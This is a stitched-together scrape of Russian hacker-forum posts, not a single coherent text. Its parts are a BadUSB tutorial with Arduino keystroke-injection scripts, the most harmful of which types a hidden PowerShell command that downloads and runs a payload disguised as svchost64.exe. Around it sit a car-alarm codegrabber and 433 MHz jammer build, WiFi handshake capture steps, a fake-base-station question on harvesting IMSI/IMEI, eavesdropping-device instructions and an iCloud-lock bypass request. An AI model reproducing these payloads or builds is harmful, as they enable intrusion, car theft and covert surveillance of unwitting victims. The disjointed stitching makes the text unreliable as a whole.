    if (lte_list[n1].arfcn!=arfcn){ //add cell only if this cell really new
    lte_list[n1].plmn = plmn;
    lte_list[n1].arfcn = arfcn;
    memcpy(lte_list[n1].channel,channel,sizeof(channel));
    memcpy(lte_list[n1].tac,tac,sizeof(tac));
    lte_list[n1].rssi = rssi;

    lte_count=n1;



   printf ("plmn = %d  arfcn = %d channel = %s tac=%s  rssi=%d  \n",lte_list[n1].plmn, lte_list[n1].arfcn, lte_list[n1].channel,lte_list[n1].tac,lte_list[n1].rssi);
    }
}


}

Обновления
18 сентября 2023 - добавлен список комплектующих для сборки первой версии сканера

Всем привет , сегодня мы обсудим такую тему как создание самодельной Badusb флешки.

Для работы нам нужно :

_Arduino (подойдет любая с возможностю емуляции usb)

Arduino IDE

Знание синтаксиса С/C++_

Выбор платы Ардуино​

Мы будем использовать Arduino micro pro. Компактная , с подходящим объемом памяти для записи скриптов, недорогая модель, полностю нам подходит!

Купить: https://www.aliexpress.com/item/1005002781852894.html?spm=a2g0o.productlist.0.0.3f914ffeI9s1Z3&algo_pvid=630befd0-0205-4e5d-879b-0705a291de1b&algo_exp_id=630befd0-0205-4e5d-879b-0705a291de1b-33&pdp_ext_f={"sku_id":"12000022158005566"}&pdp_npi=2@dis!UAH!174.43!139.39!!!27.88!!@211675d316662933032674762ea1a2!12000022158005566!sea&curPageLogUid=aD4feaNPYQb0

Как работает схема атаки на ардуино
​

В работе мы используем модуль Keyboard , когда ардуинка подключаеться к источнику питания , процесор платы начинает обробку скрипта , и поссылает команды модулю usb который емулирует клавиатуру. Тем самым система пк жертвы определяет ардуинку как клавиатуру.
Для начала атаки нужно просто вставить в пк заранее прошитую плату. Плата прошиваеться через софтину Arduino IDE .

Подготовка к прошивке​

1. Ставим Arduino IDE , при установке соглашаемсяя на установку драйверов.

2. Подключаем плату к пк по юсб проводу.

3. Заходим в програму и вибираем нашу ардуинку в меню выбора порта

Готово ! теперь можем приступить к написанию скриптов.

Пишем скрипты
​

При поиске нормальных скриптов для ардуино вы получете одно говно , везде только скрипты на языке Rubber Ducky Script. Но в просторах интернета есть прекрасный сайт Duckuino , вставляете готовый Rubber ducky Script , и копируете полученный скрипт на С зделанный под ардуино!
Сервис очень хороший но иногда может криво сконвертироваться код.
При написании свого скрипта мы юзаем модуль Keyboard. Написание скриптов для Badusb атак не очень тяжелое дело , или иззучайте семейку С , или копируйте код)

Скрипт открывает консоль и выполняет введеную в 3 строке команду:

C:Copy to clipboard

#include<Keyboard.h>
#define KEY_DELAY 50
const char command [] = "" ;

void setup() {
  Keyboard.begin();
  delay(3000);
}

void loop() {
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(KEY_DELAY*5);
  Keyboard.println("cmd");
  delay(KEY_DELAY*5);
  Keyboard.println(command);
  delay(100000);
}

Скрытое скачивание и запуск файла :

C:Copy to clipboard

#include<Keyboard.h>
#define KEY_DELAY 50
const char command [] = " " ;
void setup() {
  Keyboard.begin();
  delay(3000);
}

void loop() {
  //Pressing Win+r shortcut
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  delay(KEY_DELAY);
  Keyboard.releaseAll();
  delay(KEY_DELAY*5);
  Keyboard.println("powershell -NoP -NonI -W Hidden -Exec Bypass \"IEX (New-Object System.Net.WebClient).DownloadFile('ваш сервак',\\\"$env:temp\\svchost64.exe\\\"); Start-Process \\\"$env:temp\\svchost64.exe\\\"\"");
  delay(KEY_DELAY*5);//A delay to ensure that cmd window has been started
  delay(10000000);
}

В 16 строке замените 'ваш сервак' на путь к файлу на серваку

Здесь мы розсмотрели два самых нужных скрипта для атак , пройдем к записи скриптов на плату!

Запись скрипта на плату​

1. Копируем код и вставляем в редактор Arduino IDE

2. Компилируем и загружаем код

3. Готово! тестим все ли работает.

собрано все что необходимо для прокачки вашего скила ???

Аппаратный взлом - одна из тем, которая редко обсуждается на официальных курсах, но это по-прежнему один из наиболее важных методов, необходимых для хакеров, которые намереваются проводить полевые и физические атаки. Этот пакет включает видео с конференций, таких как DefCon , по данной теме, практические курсы, многочисленные книги, видео на Youtube и блоги.

В этом курсе вы изучите широкий круг тем, таких как

создание (Rubber Ducky) BAD USB,
атаки FPGA,
тестирование безопасности коммутаторов и маршрутизаторов,
подавление помех Wi-Fi,
прямые атаки на память,
атаки на мышь и многое другое

Click to expand...

В этот пакет входит более 40 часов обучающих видео и большое количество книг. Информацию о названиях курсов и книг в этом пакете вы можете посмотреть в видео этой статьи.

Hidden content for authorized users.


[ DropMeFiles – free one-click file sharing service

](https://dropmefiles.com/g0MFs)

Share your pictures, send large videos, exchange music or transfer big files. No registration required. Unlimited upload/download speed.

dropmefiles.com

При изучении вадрайвинга первым этапом работы есть выбор wifi адаптера для пентеста wifi точек.
Самым лучшим выбором на рынке будет адаптер alfa awus 1900.
Сегодня мы поговорим про бытовое использование адаптера , проблемы , плюсы и минусы.

Распаковка ​

В комплект входит:
-коробка
-инструкция
-адаптер
-4 антенны
-крепления
-кабель

Характеристики
​

Интерфейсы| USB 3.0
---|---
Диапазон частот| Двухдиапазонный 2,412-2.472 ГГц или 5.15-5.825 ГГц
Разъемы| 4×RP-SMA
Скорость передачи данных| 11ac: до 1300 Мбит/с (динамическая) 11g/n: до 600 Мбит/с (динамическая)
Антенна| Съемные, 2.4G / 5GHz двухдиапазонная дипольная антенна 5dB + возможность подключения внешних антенн
Беспроводная безопасность| 64/128bit WEP WPA (TKIP with IEEE 802.1x) WPA2 (AES with IEEE 802.1x) WPA Mixed
Чипсет| RTL8814U
Cовместимость| Windows 2000, XP, Vista, 7, 8, 10 Mac OS X 10.7-10.12 Linux

Первое подключение и установка драйверов
​

Драйвера:
Windows
MacOs
Linux

Установка под кали:
sudo apt install realtek-rtl8814au-dkms
find /lib/modules/uname -r/ -name "8814au.ko"
sudo reboot

Антенны​

В комплекте идут 4 антенны по 5dBi , работают на частоте 2.4 и 5 GhZ.
Антенны хорошие , возможна регуляция кута наклона антенны.
В идеале я советую купить 4 антенны [Alfa ARS-N19](https://alfa- network.eu/ars) по 9dBi , лучший вариант на рынке.

Практическое применение ​

1.Запускаем кали
2.Ставим драйвера
3.Запускаем wifite
4.Видим точку Wifi2
5.Ловим хендшейк
6.Расшифровка хендшейка
итог - перехват соседского хендшейка за минуту (хороший дальнобой адаптера)

Плюсы и минусы​

Плюсы:
- Хороший дальнобой адаптера
- 4 антенны + возможность замены антенны
- Скорость передачи данных 11ac: до 1300 Мбит/с (динамическая) 11g/n: до 600 Мбит/с (динамическая)
- Режим монитора и режим инъекции пакетов
Минусы:
- цена
- не все тулзы поддерживают чип адаптера

Итоги ​

Адаптер хороший , из всех выборов лучший на рынке , для вардрайвинга самое то!
От себя очень советую!

Всем привет!
Это комплекс, который содержит в себе кодграббер , пакета-анализатор и циничную глушилку, которая валит весь эфир на 433.92мГц. Проект выполнен на микроконтроллере PIC18F252 и LCD 3310. Комплекс предназначен для исследовательских целей, он позволит понять кое какие принципы работы охранных систем, также поможет разоблачить не добросовестных производителей автосигнализаций.

Давайте я по подробней опишу, как все работает. Начну с меню кодграббера, при включении прибора, на дисплее появится надпись «ВВЕДИТЕ КОД». Внизу мы увидим поле для его заполнения, курсор будет установлен на первую ячейку. Код состоит из 6 ячеек, вводимое значение будет от 0 до F. Думаю, для продвинутых юзеров не стоит объяснять, что пароль трех байтный, а это 256 умноженное на 256 и умноженное на 256 комбинаций, всего 16777216 комбинаций. В случаи неверного ввода, загорится надпись «ОШИБКА», которая будет моргать, после некоторого времени, устройство перейдет в запрос кода. По этому, кроме вас ни кто кодграббер не включит. После ввода пароля, загорится надпись «КОД ПРИНЯТ» и наш адрес «WWW.PHREAKER.US». Далее через несколько секунд, включится основное меню.

Меню будет содержать три закладки «КОДГРАББЕР» «АНАЛИЗАТОР» «ПОМЕХА» и логотип форума. Нужную функцию мы будем выбирать джостиком-курстором, который будет сделан из пяти кнопок. Перемещая кнопкой стрелки указатели, мы выбираем любую из трех функций. Чтобы включить выбранную функцию, мы нажимаем кнопку в середине джойстика.

Например, мы выбрали функцию «ПОМЕХА», на дисплее загорится надпись «РЕЖИМ ПОМЕХИ» «ЧАСТОТА 433.92» «МОДУЛЯЦИЯ» и «50 ГЦ». Чтобы переключить частоту модуляции глушения эфира, нужно джойстиком нажать вниз, шаг регулировки помехи 50Гц, ее можно менять от 50Гц до 600Гц. Что бы выйти в основное меню, можно нажать любую из боковых кнопок джойстика, левую или правую.

Режим анализатора включается аналогично, просто наводим стрелки и жмем джойстик в середину. После входа в это меню, нас ждет небольшая анимация, сверху в низ начнут появляться знакомые вам надписи, <=COD <=HOP <=FIX <=BUT и логотип форума, все! анализатор ждет пакета, эфир сканируется. После перехвата кода, а он определяется автоматически, кодграббер отобразит в верхней строчке принадлежность перехваченного пакета. Например, KEELOQ <=COD или STARLINE <=COD. При попадании нового кода, старый им замещается. Выход из анализатора, так же боковыми кнопками, любой.

Теперь заходим в меню кодграббера, загорится надпись «СКАНИРОВАНИЕ» «ВКЛЮЧЕНО» «433.92» и наш логотип, в этой закладке вас также встретит анимация. Внизу пробежит черная полоска и после того, как она будет исчезать, она откроет нам надпись «WWW.PHREAKER.US». После этого кодграббер ждет посылку, как только в эфире появится пакет от пульта, кодграббер пускает помеху и сразу на дисплее выводит надпись «ПРИНЯТ ПАКЕТ». Двумя строчками ниже загорится шифрованная часть первой посылки. Далее кодграббер будет находится в ожидании второй посылки, где то около 5 секунд, если она придет, то в нижних строчках загорится вторая шифрованная часть и ниже серийник с нажатой кнопкой. Все, две посылки мы сграбили! Самая фишка, это то, что после приема двух пакетов, в самой нижней строчке, будет гореть индикатор эфира, если нажать на пульт, то мы увидим, что шкала темнеет, все происходит довольно динамично. По этой шкале можно судить о том, что идет ответ от машины к пульту, когда мы будем ее открывать кодграббером.

Что бы выпустить перехваченные коды из кодграббера, достаточно нажать джойстик по середине, внизу загорится надпись «ОТПРАВКА КОДА». Напротив первого хоппинга и серийника загорятся стрелки, это в эфир пошел первый пакет, затем загорятся стрелки на против второго хопинга и серийника, это в эфир пошел второй перехваченный пакет. Выйти из этого меню можно также левой или правой кнопкой джойстика. Если пакет не побился, в силу каких то обстоятельств, то надпись на дисплее будет замещена новым пакетом, который пройдет в эфир. Во время ожидания второго пакета, это в течении 5 секунд, из меню выходить нельзя, так как программа отрабатывает эфир, а не сканирование кнопок джойстика! На функцию кодграббера будут наложены небольшие ограничения, так как этот проект направлен на исследовательские цели в первую очередь.

Скажу честно, программа еще не доработана, особенно в плане дизайна, это оказалось намного сложнее, чем я думал. Полноценная версия будет размещена в закрытом разделе, как только я ее закончу. Пароль входа в кодграббер, я буду давать лично, когда увижу, что вы этот проект реально воплотили в железе! На случай моего преждевременного ухода, дубликат ключа будет у exchange! Фотографии меню я прилагаю, все более чем наглядно. Прошивка будет ориентирована на китайскую версию LCD 3310. В ближайшее время я выложу еще дубликат этой прошивки, но для оригинального дисплея, что бы вы смогли беспрепятственно все воплотить, при наличии любого дисплея в вашем магазине.

Приемник и передатчик подключаем любой на 433.92мГц, уровень входа и выхода 5в. Кнопки

джойстика программно подтянуты к +5в, соответственно при нажатии сажаются на землю (ноль).

Приемник PORTC,5 -16 нога контроллера.

Передатчик PORTC,6 -17 нога контроллера.

Центральная кнопка джойстика PORTB,0 - 21нога контроллера.

Вверх PORTB,1 – 22 нога контроллера.

Вниз PORTB,3 – 24 нога контроллера.

Вправо PORTB,2 – 23 нога контроллера.

Влево PORTB,4 – 25 нога контроллера.

Питание LCD только от контроллера!!!!

Питание LCD PORTC,0 - 11 нога контроллера.

Ресет LCD PORTC,1 - 12 нога контроллера.

Линия DC в LCD PORTC,2 -13 нога в контроллере.

Линия данных в LCD PORTC,3 – 14 нога в контроллере.

Линия тактирования в LCD PORTC,4 -15 нога в контроллере.

Землю (общий провод) LCD, берем в произвольном месте.













Схема ПУБЛИЧНАЯ!!!!!!!!!!
Удачи в сборке

Делаем шпионское устройство своими руками из подручных средств

Существует множество различных способов шпионажа. Наверняка каждый из вас слышал о прослушивании с помощью лазера, либо через батареи отопления, либо при помощи микрофонов вмонтированных в стены здания. И всё это окутано каким- то мистическим смыслом, хотя на самом деле это просто и доступно для понимания и повторения каждым. А главное, все собирается из подручных средств.

Когда-то в лохматых годах, в одном популярном IT-издании писал подобную статью, но, наверное, толком не раскрыл сути, как именно это работает и как применять такие устройства. Да и будем честны, тот вариант, что я приводил в статье выглядел круто, но был не очень работоспособным.

«Шпионское» устройство того времени​

В результате решил его изготовить сам и продемонстрировать, как это работает.

Важно!

Прежде чем мы пойдем дальше, надо понимать, что изготовление и использование шпионских устройств подпадает под статьи:

• УК РФ Статья 138.1. Незаконный оборот специальных технических средств, предназначенных для негласного получения информации.
• УК РФ Статья 137. Нарушение неприкосновенности частной жизни.
• УК РФ Статья 183. Незаконные получение и разглашение сведений, составляющих коммерческую, налоговую или банковскую тайну.

Таким образом, всё что представлено в статье лишь демонстрация возможностей, служит исключительно для ознакомления! Надо хорошо понимать, что повторение и использование методов, описанных в данной статье, может привести к вполне реальным срокам заключения.

За себя скажу, что никоим образом не пытался ни за кем шпионить, так как считаю это, как минимум неэтичным. Игрался просто в комнате и на кухне, записывая сам себя. Не шалите, я предупредил!

Готовим железо

Устройство, которое мы будем делать, называется банально контактный микрофон. Оно никак не запрещено, инструкций по его изготовлению в интернетах море, но мало кто знает, что его можно использовать для негласного получения информации. Для его изготовления нам понадобится: пьезодинамик на голосовые частоты (любой, работающий в диапазоне между 300 и 3400 Гц), согласующий резистор, немного проводов и может быть даже паяльник, но поначалу я обходился даже без него. Все было приобретено в известном бутике для радиолюбителей.

Исходники​

В качестве записывающего устройства я хотел использовать мобильный телефон. Но, как оказалось, он определяет гарнитуру по сопротивлению. Этих резисторов у меня не оказалось, а второй раз ехать в модный бутик было лень. Однако же я расскажу о том, как это сделать, мало ли кто захочет мистические звуки записывать — это вполне легально. Надо собрать эквивалентную схему гарнитуры.

Электрическая схема гарнитуры телефона​

Таким образом, чтобы телефон определял наш контактный микрофон, надо на место динамиков впаять резисторы 30 Ом, а на место микрофона параллельно пьезодинамику резистор 1,5 кОма. Почему так, расскажу чуть позже.

Я же для своих опытов выбрал старый кассетный магнитофон, который по воле случая откопал на антресолях. Наш контактный микрофон мы будем подключать вместо аудиоголовки одной из кассет. При всей несуразности этого решения, у него один громадный плюс: очень высокая чувствительность, ведь головка должна регистрировать еле заметные магнитные пульсации аудиокассеты. И мы получаем готовый усилитель.

Подопытный​

Для записи аудио с большим трудом в центре Москвы удалось купить аудиокассету. Чистые кассеты стоят как чугунный мост, пришлось купить с записью.

Честно прослушал обе стороны этой кассеты, вытирая ностальгические слезы с лица и кровь с ушей. В результате сделал вывод, что будущее поколение ничего не потеряет, если я ее сотру.

Разбираю магнитофон и внутри вижу как три головки (одна для записи), приходят на материнскую плату магнитофона. Головки для воспроизведения имеют три контакта: левый, правый и землю (обычно оплетка). Левый и правый канал объединяю, а землю точно так же бросаю на оплетку. Провода обязательно следует использовать экранированные, иначе будет очень сильный гул наводок (у нас же высокочувствительный усилитель).

Препарируем подопытного​

Разъем подключения головки​

Из подручных материалов изготавливаю разъем вместо штатной головки правого кассетника, устанавливаю ее на место.

Готовый разъем​

Теперь поговорим о датчике. Немного теории уровня школьной физики. Магнитная головка, как можно догадаться из ее названия — это катушка индуктивности очень малого сопротивления. Когда идет протяжка ленты, в ней наводится очень малая ЭДС и попадает на усилитель. Фактически магнитную головку можно представить как источник напряжения последовательно с сопротивлением. Пьезодинамик — это, по сути, конденсатор с очень большим омическим сопротивлением (можно считать равным бесконечности), который является источником тока и дает ток независимо от сопротивления. Кстати поэтому пьезоэлементы нашли применения в зажигалках: они дадут строго малый ток, независимо от сопротивления воздуха, тогда как напряжение может расти до огромных размеров.

Я отвлекся. Моя задача была сделать эквивалентную схему магнитной головки (читай ЭДС+сопротивление) из источника тока. Те, кто хорошо знают Теоретические Основы Электротехники, понимают о чем я. А те, кто не понял, смотрите схему ниже.

Эквивалентная схема​

Таким образом, достаточно припаять эквивалентное сопротивление параллельно с пьезодатчиком и дело в шляпе. В моем случае это было около 50 Ом. Но буду честен, я припаял первый попавшийся резистор в доме, но он работал.

Наш готовый контактный микрофон​

Все готово к злобным экспериментам!

Демонстрация работы

Лучше один раз увидеть и услышать, как это работает, чем тысячу раз прочитать. Поэтому вот видео, а далее мы разберем как же все это функционирует.

В этом видео я разобрал основные принципы шпионажа. Все они основаны на том, что тела вибрируют из-за звуковых колебаний. Конечно, вибрация происходит на частоте собственных колебаний, но если математическим фильтром или аналоговым фильтром убрать ее и нормализовать сигнал, то можно получить исходный голосовой сигнал. На этом принципе основан шпионаж с помощью коммуникаций или микрофонов, встроенных в стены, шпионаж посредством лазерного съема колебаний стекол, съема колебаний осветительных ламп и даже знаменитое шпионское устройство в посольстве США. Давайте подробнее разберем все эти методы.

Прослушивание посредством перехвата колебаний света лампы

Есть отличная [статья](https://www.zdnet.com/article/lamphone-attack-lets- threat-actors-recover-conversations-from-your-light-bulb/) (англ.), которая описывает принцип работы и демонстрирует видео подобного шпионажа.

Скриншот из видеодемонстрации​

В своем видео я уже описывал принцип работы. Можно использовать тот же самый микрофон, только заменить пьезодатчик с резистором, на фототранзистор или фоторезистор (может понадобится дополнительное питание), либо просто солнечную батарею. Возможно, я бы повторил данный эксперимент, но отсутствует оптика. Поэтому расскажу сугубо теоретически.

Плафон любой лампы имеет частоту собственных колебаний. Когда мы говорим рядом с ним, мы возбуждаем его колебания. Визуально нам их не видно, но с улицы вполне можно зафиксировать эти колебания с помощью телескопа, освещать им любой оптический датчик и оцифровать. Можно было бы и камеру приладить, но она должна снимать не менее 22 000 кадров в секунду. Поэтому берем просто любой фотоэлемент. Потом эти данные мы оцифровываем. фильтруем, нормализуем удаляем шумы и получаем оригинал. Метод фильтрации подходит для всех остальных методов негласного получения информации. В любом случае всем рекомендую ознакомится со статьей подробнее.

Шпионаж с помощью лазера и окна

Метод легендарен и стар. Но весьма прост и доступен любому школьнику. Берем то же устройство, как в предыдущей главе. Только вместо телескопа у нас лазер.

Человек находится в помещении, разговаривает, а стекло в окне вторит его речи на частоте собственных колебаний. Облучаем стекло лазерным лучом и обратно его принимаем. Далее алгоритм вы знаете. Проблема этого метода очевидна: не всегда есть место для корректного размещения источника лазера и приемника. Поэтому он не очень активно применяется и используется только там, где позволяет местность.

Метод прослушивания через коммуникации

Вообще без всяких технических средств, приложите ухо к вашей батарее в будний день, когда орут дети у соседей, лают собаки и т.д. И окажется, что трубы, даже будучи вмурованные в стену, прекрасно передают звук.

Батарея начинает резонировать на частоте собственных колебаний, а металл прекрасно передает звуковые волны на очень дальние расстояния. Дальше нужно хорошо закрепить датчик. Кстати, мой метод крепления с помощью магнита не самый лучший. Надо, чтобы пьезодатчик имел прижим массой, так чтобы он хорошо деформировался от колебаний; и таким образом, чтобы площадь его контакта была максимальной. В моем случае он контачил небольшим участком как с лампой, так и с батареей. Думаю поэтому звук был не очень хороший.

Снятие колебаний предметов с помощью радиоволн

Может показаться, что это нечто из разряда фантастики. Но тем не менее таким образом, осуществлялся знаменитый шпионаж за посольством США, когда пионеры подарили послу герб и он его повесил в своем кабинете. А в данном гербе был жучок, который не имел никаких электронных устройств.

Знаменитый шпионский герб​

На Хабре уже была статья про данный жучок, но там очень скудно рассказано о принципах его действия. Устроен он весьма просто.

По сути, мембрана улавливает звуковые колебания и меняет геометрию антенны! В доме напротив стоит передающие устройство, которое вещает на частоте 330 МГц. Просто генерирует чистый синус. Принимающая антенна, облучается этим полем, меняет свои геометрические размеры и переизлучает модулированное эхо. Все, остается только принять это. Данный принцип называется “высокочастотное навязывание”. Лучше всего принцип действия этого шпионского устройства можно посмотреть в указанном ниже видео.

Таким образом, даже вязальная спица, если она правильно закреплена и имеет определенную длину, может быть шпионским устройством. И это не ирония или попытка запугать, а суровая реальность.

Домашнее задание

Хотите почувствовать себя настоящим шпионом, не вставая с дивана? У меня есть игра для вас. Специально для вас записал речевое выступление, с закрепленным контактным датчиком на лампе.

Звуковой файл и программа для опытов

Задача разгадать что же я там говорю. Стенограмму присылать не нужно, можно просто назвать в комментариях произведение, которое я зачитываю. Сам файл тут.

Мне кажется, любой звукорежиссер сможет сделать это легко. В самом начале я специально щелкаю по лампе (на скрине перегрузки вначале) для того, чтобы вы смогли определить частоты собственных колебаний лампы, а потом выделить мой голос. Удачи!

Как жить дальше?

Если у вас нет паранойи, то это не значит, что за вами не следят!

«Родина слышит» худ. Вася Ложкин​

Что делать, чтобы за вами не следили? В серьезных организациях переговорные комнаты для особо важных совещаний делаются магнитозащищенными, а так же обкладываются звукопоглощающими материалами и не имеют окон. Однако про нас с вами, можно сказать словами из анекдота про неуловимого Джо: да он просто нахрен никому не нужен. Мне кажется, не стоит думать, что за всеми нами следят. А если и следят, то есть более простые способы слежки, у вас, у каждого в кармане такой чудесный жучок лежит и все кому нужно все о вас знают. Не переживайте и спите спокойно.

Автор: Сергей @dlinyj
habr.com

Добрый день!
Может быть тут есть специалисты, способные подсказать - почему телефон при запросе identity request а сети мегафон после запроса на location update - не передает данные IMEI/IMSI ?
МТС или Билайн при запросе location update дает идентификатор tIMSI , дальше я отправляю на MS запрос identity request и телефон передает в ответ свой IMSI и IMEI , но почему-то это не работает в сети мегафон. Куда копать-что смотреть- куда пинать MS чтобы получить идентификаторы?

Отдельный вопрос про Cell Reselection . В Мегафоне он устроен явно не так как в мтс или билайн. Где-то можно почитать подробности, или может у кого есть знакомые из технической службы мегафона, которые могут пролить свет на некоторые технические моменты организации сети?
// при запуске псевдобазы с правильными mcc-mnc-lac-cid-arfcn-cro и т.д. абоненты мтс или билайн исправно на нее переключаются, но с мегафоном не срабатывает до тех пор пока принимается хотя бы один легитимный канал оператора. Причем судя по параметрам сети network assisted cell selection выключен, но вот выглядит все так как будто реселектом управляет сеть...

Has anyone already tried this tool in advance (https://flipperzero.one/zero)? Is there anyone in the forum following its development? It seems to promise to do some very interesting things ...

Уже знакомый читателям зарубежный автор Sparks31 пишет о проведении радио- разведки силами нескольких человек непосредственно на месте происшествия. Чем глубже раскрывается вопрос такой деятельности, тем более явно обозначается потребность в специализированном оборудовании, начиная с телевизионных тюнеров rtl-sdr и далее до профессиональных приборов.

---

Бывают ситуации, когда читатель присутствует непосредственно на месте событий, и ему требуется определить объёмы использования радиочастотного спектра. Объекты интереса могут включать в себя базовое, мобильное и портативное оборудование в типичном диапазоне от 25 МГц до 1,3 ГГц.

В Соединённых Штатах изучение открытых источников в 99% случаев позволяет выяснить частоты, используемые в конкретной местности. Основным источником служит интернет-ресурс FCC, федеральной комиссии по связи. Исследователь может ввести широту и долготу интересующего места, и получить список зарегистрированных в FCC частот для точки с этими координатами. Это не касается федеральных правительственных радиопередатчиков, любительских ретрансляторов и передатчиков, которые по какой бы то ни было причине лицензии не имеют. Этот способ также не даст сведений, какие частоты активно используются в данном месте. Чтобы узнать это, исследователь должен провести полевые изыскания.

Наиболее распространённый инструмент, используемый для оперативного, на месте событий, определения частот - это полицейские сканеры с возможностью поиска близких источников излучения. Они известны под торговыми наименованиями "Close Call" (производитель Uniden/Bearcat), "Signal Sweeper" (Whistler), и "Signal Stalker" (Radio Shack). В рамках данной статьи примем, что они все действуют сходным образом, и будем упоминать о них как о "CC/SS". С мобильной антенной для сканера, производства Radio Shack модели #20-032 или подобной, оператор может принимать сигналы с высоты нескольких этажей в зоне прямой видимости до мили, используя функцию CC/SS. Более занятые частоты будут засечены в первую очередь. Менее активные потребуют больше времени на поиски. Некоторые сканеры с функцией CC/SS способны автоматически сохранять в память находки, добытые с помощью CC/SS. Сканер с такой функцией может быть скрытно оставлен на месте действия, и извлечён позднее.

Недостатки использования сканеров с CC/SS следующие:

• оператор ограничен частотным перекрытием самого сканера;
• оператор не сможет отследить определённые цифровые сигналы.

Лучшим решением будет использовать пишущий цифровой частотомер, такой, как Optoelectronics Digital Scout. Он имеет перекрытие по частоте от 10 МГц до 2,6 ГГц. В дополнение к отслеживанию аналоговых сигналов, он может определять сигналы TDMA, GSM, ППРЧ, APCO 25 (P25), амплитудную манипуляцию, TETRA, пульты дистанционного управления и другие импульсные ВЧ- сигналы. Он может отследить ВЧ-всплеск длительностью 300 микросекунд, и понимает почти любую модуляцию. В спецификации не указано, но сигналы DMR и NXDN (IDAS / NEXEDGE) тоже по силам Скауту.

Цифровой Скаут имеет тысячу каналов памяти, и может записывать в неё находки. Он может перестраивать на пойманные им сигналы (так называемый процесс Reaction Tuning) следующие модели приёмников:
Icom PCR1000
Icom R10
Icom R20
Icom R7000
Icom R7100
Icom R8500
Icom R9000
AOR AR8000
AOR AR8200
Optoelectronics Optocom
Optoelectronics OS456/Lite (для Radio Shack PRO-2005 и PRO-2006)
Optoelectronics OS535 (для Radio Shack PRO-2035 и PRO-2042)
Optoelectronics R11

Optoelectronics также производит детекторы поля ближней зоны, действующие таким же образом, как сканеры с CC/SS, но с полным перекрытием радиочастотного спектра. До появления сканеров с CC/SS, любители радиоразведки использовали такие приборы, как Optoelectronics Xplorer. Это прибор, рассчитанный только на модуляцию FM, с перекрытием по частоте от 30 МГц до 3 ГГц. Изделия Optoelectronics принадлежат к испытательному оборудованию более высокого уровня, нежели начальный, и превосходят по своим возможностям сканеры с CC/SS.

Фирма AOR предлагает к своему приёмнику AR-8200MK3 расширение его возможностей, позволяющее демодулировать передачи в формате APCO/P25. С такой функцией, доступной в высококачественном связном приёмнике, оптимальным сочетанием будет подключенный к нему частотомер, а именно Digital Scout. Объединённые возможности определения цифровых сигналов, весьма широкого перекрытия по частоте, и демодулирования P25 делают эту систему весьма подходящей для определения, отслеживания и демодулирования близкорасположенных ВЧ сигналов.

Автор экспериментировал с определением сигналов в ближнем поле с тех пор, как Radio Shack представил свою модель портативного частотомера #22-305 в середине 1990-х. За прошедшие 20 лет через его руки прошли частотомеры Radio Shack, изделия Optoelectronics, сканеры с CC/SS. Опыт показывает, что самым гибким сочетанием является частотомер Optoelectronics Scout, подключённый к портативному широкополосному связному приёмнику, чтобы перестраивать его на пойманные сигналы.

Отличное устройство в связке )

Вне зависимости от конкретного производителя и модели оборудования, находящегося на руках, иметь возможность прибыть на место и выявить интенсивность радиообмена - необходимая функция радио-разведки. Это должна быть задача, которую вы безусловно сможете выполнить.

В дополнение к оборудованию радиоперехвата, радио-разведчики, занятые оперативным сбором сведений, должны быть оснащены оборудованием оптического наблюдения, дневным и ночным. Это может включать в себя оборудование от гражданского бинокля 10х50 до дальномеров и приборов ночного видения. Эти устройства могут быть использованы для визуального опознавания средств связи и выяснения их рабочих диапазонов. Эта методика подтвердила свою работоспособность в Фергюсоне (беспорядки в августе 2014го - прим. перев.), Балтиморе (волнения весной 2015го - п.п.) и позже в Бёрнсе (противостояние в Орегоне, зима 2015-2016го - п.п.) Бёрнс служит ярким примером деятельности некомпетентных, возможно, в принципе необучаемых, допускающих грубые нарушения режима секретности персонажей, и должен стать серьёзным уроком читателям, которые склонны извлекать выводы из событий.

В дополнение к частотомерам и сканерам с CC/SS, для оперативной идентификации частот могут быть использованы спектроанализаторы и приёмники с графическими панорамными адаптерами, такие, как RTL- SDR. Они также могут применяться для определения излучателей не-связного назначения и широкого разнообразия широкополосных сигналов. Цены на эти устройства упали до уровня, на котором они стали легко доступны. Однако, они по-прежнему непросты в освоении для полноценного, а не дилетантского, использования.

Осуществляя деятельность по радиоперехвату, какой бы она ни была, следует соответствующим образом разделять функции. Группа радиоразведки должна состоять из группы снятия первичной информации, которая определяет активную частоту и дополнительную информацию (режим, субтоны, субкоды и др.), и группы сбора подробной информации, которая осуществляет по возможности опознание полученной от напарников частоты по открытым источникам и далее ведёт за ней наблюдение.

Зона особенно активного радиообмена может потребовать участия нескольких радиооператоров для выполнения задач, возложенных на обе группы. Каждому оператору группы снятия первички может быть выделен отдельный участок диапазона или сектор поиска, в зависимости от требований обстановки, либо же на определённый диапазон могут быть назначены несколько операторов. Особенно активная частота может стать объектом внимания отдельного оператора из группы сбора, в противоположность обычному порядку, когда оператор занимается несколькими частотами. Один оператор группы снятия первички всегда должен заниматься визуальным наблюдением, если есть возможность. Ключевая цель – быстро и точно снять информацию о частотах, и затем на этой основе точно и подробно собирать разведданные.

Данные, собранные обеими группами, передаются аналитической группе. Хотя некоторые материалы радиоперехвата почти не требуют аналитической обработки, подготовленная аналитическая команда необходима для надлежащей оценки разведданных в стратегической (долгосрочной) перспективе. Аналитическая группа должна быть совершенно отделена от групп снятия и сбора, хотя она будет работать с ними в очень тесной смычке.

(С) Sparks31

От меня: не новая, но позвновательная статья. Если тема интересна - обязательно поработать с анализатором спектра (например SDRSharp), плагинами и свистком. Принцип резведки схож с принципом поиска жучков.

Всем привет,

Я нашёл айфон там блок есть не знаю как его разблокировать. Есть кто знает как разблокировать icloud?

Электронные кошельки Google Pay, Samsung Pay и Apple Pay считаются наиболее современными платежными инструментами. Однако они тоже подвержены уязвимостям, поскольку все еще зависят от технологий, созданных тридцать лет назад. В сегодняшней статье я расскажу о методах взлома популярных электронных кошельков, а также раскрою детали новой атаки на кошельки и карты EMV/NFC — Cryptogram Confusion.

ПРЕДЫСТОРИЯ​

Если проследить эволюцию стандарта EMV, то вначале были чиповые смарт‑карты. Затем эти карты оснастили антенной и превратили в бесконтактные карты, унаследовавшие почти все функции от EMV. Но карточным брендам этого было мало, и в 2011 году уже существовавший тогда Google Wallet оснастили функцией бесконтактной оплаты с помощью NFC.

